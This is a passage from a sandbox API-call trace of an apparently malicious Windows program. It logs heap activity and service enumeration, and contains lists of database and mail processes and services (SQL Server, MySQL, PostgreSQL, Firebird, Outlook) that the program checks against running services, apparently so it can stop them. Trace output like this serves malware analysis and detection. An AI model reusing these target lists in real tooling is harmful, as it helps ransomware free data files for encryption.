hHeap=0x470000) returned 1 [0280.101] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4caa48 | out: hHeap=0x470000) returned 1 [0280.101] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4f9f50 | out: hHeap=0x470000) returned 1 [0280.101] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4cab08 | out: hHeap=0x470000) returned 1 [0280.101] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x50b708 | out: hHeap=0x470000) returned 1 [0280.101] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ca8f8 | out: hHeap=0x470000) returned 1 [0280.101] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4854c0 | out: hHeap=0x470000) returned 1 [0280.101] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4866b0 | out: hHeap=0x470000) returned 1 [0280.101] lstrlenW (lpString="%systemdrive%") returned 13 [0280.102] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4adac0 | out: hHeap=0x470000) returned 1 [0280.102] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4b55d8 | out: hHeap=0x470000) returned 1 [0280.102] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x50b718 | out: hHeap=0x470000) returned 1 [0280.102] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091f0, lpParameter=0x4d93c0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x28c [0280.103] WaitForMultipleObjects (nCount=0x2, lpHandles=0x48bca8*=0x260, bWaitAll=1, dwMilliseconds=0xffffffff) Thread: id = 32 os_tid = 0xdd8 Thread: id = 34 os_tid = 0xde4 [0280.065] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4caaf0 [0280.065] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4caaf0, Size=0x20) returned 0x4adae8 [0280.065] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4adae8, Size=0x40) returned 0x487940 [0280.065] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x487940, Size=0x80) returned 0x4b6078 [0280.065] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b6078, Size=0x100) returned 0x4f9b30 [0280.065] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4caaf0 [0280.065] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4caaf0, Size=0x20) returned 0x4adc28 [0280.065] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4adc28, Size=0x40) returned 0x487868 [0280.065] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x487868, Size=0x80) returned 0x4b5f68 [0280.065] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4b5f68, Size=0x100) returned 0x4fa058 [0280.065] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x4caaf0 [0280.066] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x4) returned 0x50b778 [0280.066] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4cabb0 [0280.066] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x50b778, Size=0x8) returned 0x50b788 [0280.066] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x14) returned 0x486550 [0280.066] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x50b788, Size=0x10) returned 0x4ca8e0 [0280.066] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x18) returned 0x4866d0 [0280.066] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1a) returned 0x4ad980 [0280.066] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4ca8e0, Size=0x20) returned 0x4adcc8 [0280.066] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1c) returned 0x4ad9a8 [0280.066] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x16) returned 0x486570 [0280.066] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1a) returned 0x4adcf0 [0280.066] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xc) returned 0x4ca8e0 [0280.066] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x4) returned 0x50b728 [0280.066] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x40) returned 0x487988 [0280.066] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x50b728, Size=0x8) returned 0x50b778 [0280.066] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x3c) returned 0x487a18 [0280.066] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x50b778, Size=0x10) returned 0x4cb8c8 [0280.067] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x14) returned 0x4866f0 [0280.067] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x18) returned 0x486530 [0280.067] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4cb8c8, Size=0x20) returned 0x4adae8 [0280.067] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x24) returned 0x485460 [0280.067] lstrlenW (lpString="1c8.exe;1cv77.exe;outlook.exe;postgres.exe;mysqld-nt.exe;mysqld.exe;sqlservr.exe;") returned 81 [0280.067] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4f9b30 | out: hHeap=0x470000) returned 1 [0280.067] lstrlenW (lpString="FirebirdGuardianDefaultInstance;FirebirdServerDefaultInstance;sqlwriter;mssqlserver;sqlserveradhelper;") returned 102 [0280.067] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4fa058 | out: hHeap=0x470000) returned 1 [0280.067] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x4ad9d0 [0280.068] EnumServicesStatusExW (in: hSCManager=0x4ad9d0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 0 [0280.068] GetLastError () returned 0xea [0280.068] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1b4e) returned 0x4cc7b8 [0280.068] EnumServicesStatusExW (in: hSCManager=0x4ad9d0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4cc7b8, cbBufSize=0x1b4e, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4cc7b8, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 1 [0280.069] CloseServiceHandle (hSCObject=0x4ad9d0) returned 1 [0280.070] lstrlenW (lpString="AppXSvc") returned 7 [0280.070] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0280.070] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0280.070] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0280.070] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0280.070] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0280.070] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0280.070] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0280.070] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0280.070] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0280.070] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0280.070] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0280.070] lstrlenW (lpString="Audiosrv") returned 8 [0280.070] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0280.070] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0280.070] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0280.070] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0280.070] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0280.070] lstrlenW (lpString="BFE") returned 3 [0280.070] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0280.071] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0280.071] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0280.071] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0280.071] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0280.071] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0280.071] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0280.071] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0280.071] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0280.071] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0280.071] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0280.071] lstrlenW (lpString="CDPSvc") returned 6 [0280.071] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0280.071] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0280.071] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0280.071] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0280.071] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0280.071] lstrlenW (lpString="ClickToRunSvc") returned 13 [0280.071] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0280.071] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0280.071] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0280.071] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0280.071] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0280.071] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0280.071] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0280.071] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0280.071] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0280.071] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0280.072] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0280.072] lstrlenW (lpString="CryptSvc") returned 8 [0280.072] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0280.072] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0280.072] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0280.072] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0280.072] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0280.072] lstrlenW (lpString="DcomLaunch") returned 10 [0280.072] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0280.072] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0280.072] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0280.072] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0280.072] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0280.072] lstrlenW (lpString="DeviceAssociationService") returned 24 [0280.072] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0280.072] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0280.072] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0280.072] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0280.072] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0280.072] lstrlenW (lpString="Dhcp") returned 4 [0280.072] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0280.072] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0280.072] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0280.072] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0280.072] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0280.072] lstrlenW (lpString="Dnscache") returned 8 [0280.072] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0280.072] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0280.073] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0280.073] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0280.073] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0280.073] lstrlenW (lpString="DPS") returned 3 [0280.073] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0280.073] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0280.073] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0280.073] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0280.073] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0280.073] lstrlenW (lpString="DusmSvc") returned 7 [0280.073] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0280.073] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0280.073] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0280.073] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0280.073] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0280.073] lstrlenW (lpString="EventLog") returned 8 [0280.073] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0280.073] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0280.073] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0280.073] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0280.073] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0280.073] lstrlenW (lpString="EventSystem") returned 11 [0280.073] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0280.073] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0280.073] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0280.073] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0280.073] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0280.074] lstrlenW (lpString="FontCache") returned 9 [0280.074] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0280.074] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0280.074] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0280.074] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0280.074] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0280.074] lstrlenW (lpString="gpsvc") returned 5 [0280.074] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0280.074] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0280.074] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0280.074] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0280.074] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0280.074] lstrlenW (lpString="iphlpsvc") returned 8 [0280.074] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0280.074] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0280.074] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0280.074] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0280.074] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0280.074] lstrlenW (lpString="KeyIso") returned 6 [0280.074] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0280.074] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0280.074] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0280.074] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0280.074] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0280.074] lstrlenW (lpString="LanmanServer") returned 12 [0280.074] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0280.074] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0280.074] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0280.075] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0280.075] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0280.075] lstrlenW (lpString="LanmanWorkstation") returned 17 [0280.075] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0280.075] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0280.075] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0280.075] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0280.075] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0280.075] lstrlenW (lpString="lfsvc") returned 5 [0280.075] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0280.075] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0280.075] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0280.075] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0280.075] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0280.075] lstrlenW (lpString="lmhosts") returned 7 [0280.075] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0280.075] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0280.075] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0280.075] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0280.075] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0280.075] lstrlenW (lpString="LSM") returned 3 [0280.075] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0280.075] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0280.075] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0280.075] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0280.075] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0280.075] lstrlenW (lpString="MpsSvc") returned 6 [0280.076] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0280.076] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0280.076] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0280.076] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0280.076] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0280.076] lstrlenW (lpString="NcbService") returned 10 [0280.076] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0280.076] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0280.076] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0280.076] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0280.076] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0280.076] lstrlenW (lpString="netprofm") returned 8 [0280.076] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0280.076] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0280.076] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0280.076] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0280.076] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0280.076] lstrlenW (lpString="NgcSvc") returned 6 [0280.076] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0280.076] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0280.076] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0280.076] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0280.076] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0280.076] lstrlenW (lpString="NlaSvc") returned 6 [0280.076] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0280.076] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0280.076] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0280.076] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0280.077] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0280.077] lstrlenW (lpString="nsi") returned 3 [0280.077] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0280.077] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0280.077] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0280.077] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0280.077] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0280.077] lstrlenW (lpString="PcaSvc") returned 6 [0280.077] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0280.077] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0280.077] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0280.077] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0280.077] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0280.077] lstrlenW (lpString="PlugPlay") returned 8 [0280.077] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0280.077] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0280.077] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0280.077] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0280.077] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0280.077] lstrlenW (lpString="Power") returned 5 [0280.077] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0280.077] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0280.077] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0280.077] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0280.077] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0280.077] lstrlenW (lpString="ProfSvc") returned 7 [0280.077] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0280.077] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0280.078] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0280.078] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0280.078] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0280.078] lstrlenW (lpString="RpcEptMapper") returned 12 [0280.078] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0280.078] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0280.078] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0280.078] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0280.078] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0280.078] lstrlenW (lpString="RpcSs") returned 5 [0280.078] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0280.078] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0280.078] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0280.078] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0280.078] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0280.078] lstrlenW (lpString="SamSs") returned 5 [0280.078] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0280.078] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0280.078] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0280.078] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0280.078] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0280.078] lstrlenW (lpString="Schedule") returned 8 [0280.078] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0280.078] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0280.078] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0280.078] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0280.079] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0280.079] lstrlenW (lpString="SecurityHealthService") returned 21 [0280.079] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0280.079] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0280.079] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0280.079] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0280.079] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0280.079] lstrlenW (lpString="SENS") returned 4 [0280.079] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0280.079] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0280.079] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0280.079] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0280.079] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0280.079] lstrlenW (lpString="ShellHWDetection") returned 16 